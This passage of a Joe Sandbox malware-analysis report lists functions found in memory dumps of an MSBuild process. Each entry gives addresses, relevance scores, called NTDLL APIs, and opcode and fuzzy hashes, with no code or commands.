Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: InformationProcess64QueryWow64
String ID: buz
API String ID: 1933981353-3044919918
Opcode ID: ab3eedb6d5f0d515f8c902329a8080857b2cc81757dc3c29760fbd5424fd0652
Instruction ID: 1d88ca135138713c0455db979010875ca93cc6510d3ee5ff1bd2b435112ac944
Opcode Fuzzy Hash: ab3eedb6d5f0d515f8c902329a8080857b2cc81757dc3c29760fbd5424fd0652
Instruction Fuzzy Hash: CE4166B9D052589FCF00CFA9D984ADEFBB1BB49310F24A02AE818B7310D375A945CF64

Function 00EBD3C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtWow64QueryInformationProcess64.NTDLL(?,?,?,?,?), ref: 00EBD474

Strings

buz, xrefs: 00EBD3E5

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: InformationProcess64QueryWow64
String ID: buz
API String ID: 1933981353-3044919918
Opcode ID: 85316c58506cebf1d50d831e86b0d413c044e868bebbdbc6dcdb966c1c05b38e
Instruction ID: ab3853e2649835852f6ac45c54ea45f51664fce64c519c28f8cf4e6684eb465d
Opcode Fuzzy Hash: 85316c58506cebf1d50d831e86b0d413c044e868bebbdbc6dcdb966c1c05b38e
Instruction Fuzzy Hash: D54166B9D052589FCB00CFA9D984ADEFBB1BB49310F10902AE818B7310D375A905CF64

Function 059D8A8F Relevance: 3.3, APIs: 2, Instructions: 293
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059D8BB3
LdrInitializeThunk.NTDLL ref: 059D8CDD

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03571059fb7c556aa33cb8256b17b386ef3ec16218dea5b335b65c2076af961a
Instruction ID: 3f5e0ecdda326c6df923fdaf6cc85c4aba44b547b8b9ef746c7d75d1dde83f53
Opcode Fuzzy Hash: 03571059fb7c556aa33cb8256b17b386ef3ec16218dea5b335b65c2076af961a
Instruction Fuzzy Hash: 41C10375E05258CFDB54CFA5C884AAEFBB6BF89300F20D46AD409AB355DB349946CF10

Function 059D9B28 Relevance: 1.9, APIs: 1, Instructions: 367
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059D9F90

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1f6f4629f4bfcdcb2c6d46cae35dc9e8fe91de81a4b6e5be7c9262ac15fb43e2
Instruction ID: 65df89af9bd958b12b019085dbd3123f73aea8b3441fab5f0b755632242dfbc5
Opcode Fuzzy Hash: 1f6f4629f4bfcdcb2c6d46cae35dc9e8fe91de81a4b6e5be7c9262ac15fb43e2
Instruction Fuzzy Hash: 79F1D174D05218CFDB24DFA9C984B9DFBB2BF89300F20C5AAD409A7255DB349A85CF60

Function 059D06F0 Relevance: 1.7, APIs: 1, Instructions: 173
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 059D07FF

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 30d997372660b433beac091512fa875a78522e023435bbf9c106d9a0e996483d
Instruction ID: a21c298977a5d06375e143a7f6134af568b9b83822bc017163964315a5a0a5f5
Opcode Fuzzy Hash: 30d997372660b433beac091512fa875a78522e023435bbf9c106d9a0e996483d
Instruction Fuzzy Hash: F7719274E04208CFDB14DFAAD584A9EFBF2BF89300F24D129D409AB255E7349946CF54

Function 0599EAE8 Relevance: 1.7, Strings: 1, Instructions: 422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 0599EF80

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 03c4344c89d296bb9c58e482213697c27457f6d44e90b82a3bc0d9663e19e066
Instruction ID: 0b3ae13c7e1ce162ec5efc6b62b5dd5a75435c9a9fa9ce938c80359bd36c7c12
Opcode Fuzzy Hash: 03c4344c89d296bb9c58e482213697c27457f6d44e90b82a3bc0d9663e19e066
Instruction Fuzzy Hash: 38023B70A00205DFDB19DF68C499AAEBBBBFF88301F548469E4069B391DB35ED45CB90

Function 00EBC038 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 00EBC0E1

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac0d00647d45304eb9d4c7c925e24a6bb89e4daa7bdb059fb5db01c6a416f823
Instruction ID: b50e6fc9e101d99228e8e0eb9e08010aea1afbe800b7a96eedb1453614b9477a
Opcode Fuzzy Hash: ac0d00647d45304eb9d4c7c925e24a6bb89e4daa7bdb059fb5db01c6a416f823
Instruction Fuzzy Hash: 3C41AF74E05208DFDB18DFA9D584ADEBBF2AF89301F20912AE409BB365DB355842CB54

Function 00EBDD94 Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtWow64ReadVirtualMemory64.NTDLL(?,?,?,?,?,?,?), ref: 00EBDDBB

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID: Memory64ReadVirtualWow64
String ID:
API String ID: 3357887247-0
Opcode ID: 76f38c2af00e41dd2006f6f995d1ec7b26f3576111f71d7baefd8362e35d6b6d
Instruction ID: 7bc5531b4c624f398a08fff64bf8f9c82b313e8e1b01d1201d9646577283b10c
Opcode Fuzzy Hash: 76f38c2af00e41dd2006f6f995d1ec7b26f3576111f71d7baefd8362e35d6b6d
Instruction Fuzzy Hash: 11116675D0424D9FDF10CFE8D884ACDFBB1AB48314F24901AE919BB260D376A896DB50

Function 00EBC2B0 Relevance: .7, Instructions: 721COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a12c82a4483e9317c3c610fe0d2955abdbc1d3f11e55b005ee2865b6a01d57a
Instruction ID: c3e9974d6a2cb47739fd2f1396469556d80a7ebf7f58c84d3cb0347032f53150
Opcode Fuzzy Hash: 1a12c82a4483e9317c3c610fe0d2955abdbc1d3f11e55b005ee2865b6a01d57a
Instruction Fuzzy Hash: 6572DE75901228DFCB65DF64CC44BEABBB6BF88300F1091EAE509A7261DB319E84DF40

Function 05999430 Relevance: .7, Instructions: 666COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c61a319b2999b4856fbf2fbf090e99b0d19821932ade88963e32eecec4ff0be
Instruction ID: 1bd0de8fe1e0a9c532c4a5166de9236b6e9f311478bede479248db0b12bca253
Opcode Fuzzy Hash: 0c61a319b2999b4856fbf2fbf090e99b0d19821932ade88963e32eecec4ff0be
Instruction Fuzzy Hash: 04523B35600605DFCB25DF68C584A6AFBF6FF88301B558959E84A9B751DB30FC81CB90

Function 059D7F48 Relevance: .7, Instructions: 662COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8882de563af2d4d29dce999ead201cda0083025fb0b3a29c784438f371168d39
Instruction ID: 3c0b79bcd1bb2919797424185be62369d5513d3152213b53bc6886c97f5a650b
Opcode Fuzzy Hash: 8882de563af2d4d29dce999ead201cda0083025fb0b3a29c784438f371168d39
Instruction Fuzzy Hash: 07520374E05229CFCB68DF65C844BEEBBB6BF89301F1484A9D409A7251DB319E85CF60

Function 05995868 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058813538ee7f270c47cc7d3937ec7330a7a223600120a48eb014b9b28b8e2cf
Instruction ID: f9adb374248d300bfe63e4f155695a2ab0fb41ecbc719347ee8f5b2c951ec4c6
Opcode Fuzzy Hash: 058813538ee7f270c47cc7d3937ec7330a7a223600120a48eb014b9b28b8e2cf
Instruction Fuzzy Hash: 46327C30A04301CFDB29DF29C488B7ABBF6BF85315F558869E546CB651DB35E881CB50

Function 00EB9782 Relevance: .5, Instructions: 545COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd97468dcbb6b44555a1b3186a048487150187688a784a717d383ab646e82863
Instruction ID: d316d741ac65da64e187f70d01eb09fe1fb6b75e45bb963735cca7dc2a752146
Opcode Fuzzy Hash: dd97468dcbb6b44555a1b3186a048487150187688a784a717d383ab646e82863
Instruction Fuzzy Hash: 2B42CD74D05228CFDB69DF65C880BEDBBB2BB89300F1091EAC549A7290DB359E85DF50

Function 059D24B0 Relevance: .5, Instructions: 542COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bec3ca7ad9dfa73bb5126416823edb621b679220f9c92d2258f647997a0b140a
Instruction ID: 209ecf89b0aa6cb2532e8e541163b53a1dc6ba3f0765b120f27f373b535d6aa0
Opcode Fuzzy Hash: bec3ca7ad9dfa73bb5126416823edb621b679220f9c92d2258f647997a0b140a
Instruction Fuzzy Hash: F342B1B4D05228CFDB24CFA5C984BDDFBB2BF89300F1085AAE409A7250DB755A85CF50

Function 05923F50 Relevance: .5, Instructions: 530COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbc699cce19e9127547ecd562f90a30ff122f32a1714f3a758375a2d2ce52df4
Instruction ID: fafde3a5e91290aa540e477a661159cfeb3ec032a9edd949e95eeb08e3ec9530
Opcode Fuzzy Hash: cbc699cce19e9127547ecd562f90a30ff122f32a1714f3a758375a2d2ce52df4
Instruction Fuzzy Hash: 46127334B002158FDB54DF69C494AAEBBF6FF88710B148169E90AEB365DB31EC41CB90

Function 0592CBC8 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb9e8f9f7e1b7223aae4f98198c3c7adcc489fe879e5cb4a350b23900923f39
Instruction ID: 31841f0afc71b5c888c367f302b60ec12160dfa2e06adade1e519573685c9747
Opcode Fuzzy Hash: cbb9e8f9f7e1b7223aae4f98198c3c7adcc489fe879e5cb4a350b23900923f39
Instruction Fuzzy Hash: 38F1A430B05325EBDB159F64984977E7AABFF88740F14842AF806D7398DB309C42CBA1

Function 059D2E5F Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8069b85fee1aa43e90eac20ef07194dadc54d0fd203275b58a2f71cb7c69d927
Instruction ID: eb99c56f5ddf0e5d23b5ddd1c2c688901c142a057d8b042c9ca296459b0b0fb8
Opcode Fuzzy Hash: 8069b85fee1aa43e90eac20ef07194dadc54d0fd203275b58a2f71cb7c69d927
Instruction Fuzzy Hash: 1712CF74A052288FEB64DF29CD44BDABBBAFB49301F0484EAD40CA7251DB319E85CF51

Function 059DB320 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18049e39ea8b29f8eb42a6f05074c1d4fbcd801970ae5d6667a7ea3795ba8aa8
Instruction ID: adfa3f3a1b90e30730d5afd0721f800853c30d591453c5a3b165b7b39f446c6c
Opcode Fuzzy Hash: 18049e39ea8b29f8eb42a6f05074c1d4fbcd801970ae5d6667a7ea3795ba8aa8
Instruction Fuzzy Hash: F912E174E05228CFDB28DF65C944B9EFBB2BF49300F1495EAD409AB251DB349A85CF60

Function 059D8E52 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42f0e2d1a44dfd68d30203c00af971576ee70ed8b24d42fd35c7f3b50b427d7
Instruction ID: 7c35acf213e461000897b3411f4a887eee8307b5fbac60404012b204ee18b473
Opcode Fuzzy Hash: e42f0e2d1a44dfd68d30203c00af971576ee70ed8b24d42fd35c7f3b50b427d7
Instruction Fuzzy Hash: 58F1B131A04256CBCB15DF75C5502BDFBB2FF85300F24CA69D446AB242EB759A85CBA0

Function 059D3CF2 Relevance: .4, Instructions: 408COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb56eb983f1de4d4d00b9284071117bf8b10f87868f011f3822e7ed35442608
Instruction ID: 1a15e390f4900a75d18e31ddeb5a6f94099c3b165e1434c2ec77fdf7175052d2
Opcode Fuzzy Hash: ffb56eb983f1de4d4d00b9284071117bf8b10f87868f011f3822e7ed35442608
Instruction Fuzzy Hash: A702E370D01218CFDB24DFA9C990B9EBBB6FF89300F5085A9D549A7390DB359A85CF60

Function 05997AB0 Relevance: .4, Instructions: 407COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d353f9fe3fe39ab7ac97d9ae92f3b52051fc039035f19fc73168cee48ec3293
Instruction ID: e4067897ff23d9cde36f169a1794a0bfd3312e1c0fa7987d4767e85454b4c964
Opcode Fuzzy Hash: 1d353f9fe3fe39ab7ac97d9ae92f3b52051fc039035f19fc73168cee48ec3293
Instruction Fuzzy Hash: 00027C35A14705CFDB29CFA9C484AAABBF6FF89300F148969E446DB761DB34E841CB50

Function 00EBD6D0 Relevance: .4, Instructions: 385COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5c4364d22ab97db81924f02efa5402d4bbfb4546646db604c34985e2b1897b7
Instruction ID: 3a2d76418ac10b6259bc6887f4ad27b2998cdaa5658d19a32c7dcd93ac605d62
Opcode Fuzzy Hash: b5c4364d22ab97db81924f02efa5402d4bbfb4546646db604c34985e2b1897b7
Instruction Fuzzy Hash: EE126F74E05218CFDB64DFA9C984BDDBBB2BF89300F1091A9D849AB355DB309A85CF50

Function 00EB26F2 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7013b4a9b6dd1b61c2ff33f30d52721944bff77c1683e976173c6f461c7f4d7
Instruction ID: 573b4a53992179c2d8738271bb07f9eecfdffaef6af5ee25618886d2dc751788
Opcode Fuzzy Hash: f7013b4a9b6dd1b61c2ff33f30d52721944bff77c1683e976173c6f461c7f4d7
Instruction Fuzzy Hash: 93D1AC30B006508FDB19DF79D8546AEBBF2AF89310B14856DE506DB3A1DF35EC068BA1

Function 00EB8FF7 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e266982756a5ce72d16a213fda139170c21fc953eea0ce214bf1b6173dce49
Instruction ID: f0c0bc09b2130c707d5263acf157d19c3e784d7567c677360bbcc7faf5731b2b
Opcode Fuzzy Hash: d7e266982756a5ce72d16a213fda139170c21fc953eea0ce214bf1b6173dce49
Instruction Fuzzy Hash: 8EF1C074D01229CFDB68DF65C984BDDBBB2BB89300F1091EAD509A7291DB345E85CF60

Function 05926868 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f335300d3992631ca1130b50a5728473ea72118f691397a2d820307d6102b9f9
Instruction ID: bcc63b80ad76a4f2f313722224f2d2b8103101436dc0cca4d6fdf8b1ad5a33e1
Opcode Fuzzy Hash: f335300d3992631ca1130b50a5728473ea72118f691397a2d820307d6102b9f9
Instruction Fuzzy Hash: 9AD15F70A013199FDB05DF68D880B9EBBF6FF88300F148569E409AB695DB31ED45CB91

Function 059DF8C0 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b963699991bcfea6d6e1527b31f2f0062df78e6421b2a21b5e46a5c4f4440e1
Instruction ID: b576873b040a4d3ddea089be458ff5a85fddf1e7378af84d15908596c4e2ec9a
Opcode Fuzzy Hash: 0b963699991bcfea6d6e1527b31f2f0062df78e6421b2a21b5e46a5c4f4440e1
Instruction Fuzzy Hash: 71E1B174E01219DFDB14DFA9C884AAEFBB6FF88300F148569E409AB255D734A982CF50

Function 00EBA92A Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d980d7c31c8acfc5c28ece0a860ba1a1553e94b2fb65078ccf5865bc7d5848
Instruction ID: 4eb4b1856ece16271919209754071671621336d4860ebf14a861d9cce2be8928
Opcode Fuzzy Hash: 40d980d7c31c8acfc5c28ece0a860ba1a1553e94b2fb65078ccf5865bc7d5848
Instruction Fuzzy Hash: C9B1E574E01218CFDB18DFA9D980A9EBBF2FF89300F248569D409AB354DB35A985CF50

Function 059D4348 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c3a093aa0d1054b4b789dda0f2bbf0201714ba4896e91d93e7431f69d888944
Instruction ID: 700f595d1524de0c06ac920a543bd9b3970330e2558f1ba54ff43eee1774a899
Opcode Fuzzy Hash: 1c3a093aa0d1054b4b789dda0f2bbf0201714ba4896e91d93e7431f69d888944
Instruction Fuzzy Hash: 0BB17D74E002199FDB54CFA9C984AADFBF2BF48300F14D1AAE819A7351DB749A85CF50

Function 00EBD6C0 Relevance: .2, Instructions: 229COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9947bc98aca9898d40328e4bd06fa8f98c81fa194d29479b19985387c99ceb3c
Instruction ID: 4ec24b22a33eeb286ff901b152cbe22bada925a081773937ca43d014d0b59194
Opcode Fuzzy Hash: 9947bc98aca9898d40328e4bd06fa8f98c81fa194d29479b19985387c99ceb3c
Instruction Fuzzy Hash: 27A19275E052188FDB14CF6AD980ADEBBF2BF89300F14D1AAD409AB355EB309985CF40

Function 059DBE88 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c93d49dbcf7e2e12f9ca13b3350afe14ce9cebb83ec48f39a25bc1b13905c2f3
Instruction ID: 52d98e98c7584ac4cb73e058b9df9d85aca36d431615895f8fbace648f562a87
Opcode Fuzzy Hash: c93d49dbcf7e2e12f9ca13b3350afe14ce9cebb83ec48f39a25bc1b13905c2f3
Instruction Fuzzy Hash: C1A17C74E05218DFDB54CFA9D980A9DFBF2BF89310F1491AAE809AB355DB309981CF50

Function 059DD598 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d865867c47496b9814ce1901d100e2bd1ae041250181d5aee2983eb214f4621
Instruction ID: 2d899db4c9f7f3ae97fc24b41df580b05fc1dc1c824c48a438bfc3476cd94d50
Opcode Fuzzy Hash: 1d865867c47496b9814ce1901d100e2bd1ae041250181d5aee2983eb214f4621
Instruction Fuzzy Hash: 8DA1BD74D00318CFDB58CFA9D844AEDBBB6FF88300F20846AE819AB255DB355985CF50

Function 059D58C2 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f9fc6df7e34d3871e952b187e680065bdf5dde8b25dbba2ae2c07005ec3913
Instruction ID: ea5b6101bd75d18c19f6d75c674b5991741b3ec38a8e34434574f61d6220f7f0
Opcode Fuzzy Hash: 39f9fc6df7e34d3871e952b187e680065bdf5dde8b25dbba2ae2c07005ec3913
Instruction Fuzzy Hash: 4E91B578E00318DFDB05EFA9D854B9EBBB2FF88701F148029E8056B398DB756942DB51

Function 059D55F0 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 522eb7c99705027e27a58b5ea5889d113d72a12a6c4ec83186977ab3dc733545
Instruction ID: eb530041734878060ab2aeb75a82d0dc55d133a7e83c27a70ece2c4d8ca7490c
Opcode Fuzzy Hash: 522eb7c99705027e27a58b5ea5889d113d72a12a6c4ec83186977ab3dc733545
Instruction Fuzzy Hash: DF919174E05218DFDB54DFA9D884ADDFBB2BF89300F24816AE819AB355DB309941CF50

Function 059D24A0 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1104f2d069acf50e242e54bcaa754ed6bb1462a95a31fac22abbe1b3834fb251
Instruction ID: 10e4361ac8650d3abf628699497498c1ff2749371cd2959f73bb7e62ea9da552
Opcode Fuzzy Hash: 1104f2d069acf50e242e54bcaa754ed6bb1462a95a31fac22abbe1b3834fb251
Instruction Fuzzy Hash: 0EA1A3B4E012188FEB28DF65D9547DEFBB2BF88304F1081A9E409AB394DB755A85CF50

Function 00EBA5F0 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da4a01635a6455d88d5e65f5e5206fddaa538a9288000c5319f4340bb1fbe212
Instruction ID: e8cd4a2f432153d06a5d46a035b025ca31a62168558d26372de557bb787b7b65
Opcode Fuzzy Hash: da4a01635a6455d88d5e65f5e5206fddaa538a9288000c5319f4340bb1fbe212
Instruction Fuzzy Hash: 44719D74D05218CFDB14CFA9C884AEDBBB2FF89305F28906AD409BB254DB359986CF10

Function 00EB1FF8 Relevance: .2, Instructions: 176COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23b791a81e1c98e213f936553de08d15fd16eefb6043d523500c7519898ae9b5
Instruction ID: 3d22f9c5181e89c34f08d6761ca21c0cbe181e9c11420c99a9eedd2d3531f49e
Opcode Fuzzy Hash: 23b791a81e1c98e213f936553de08d15fd16eefb6043d523500c7519898ae9b5
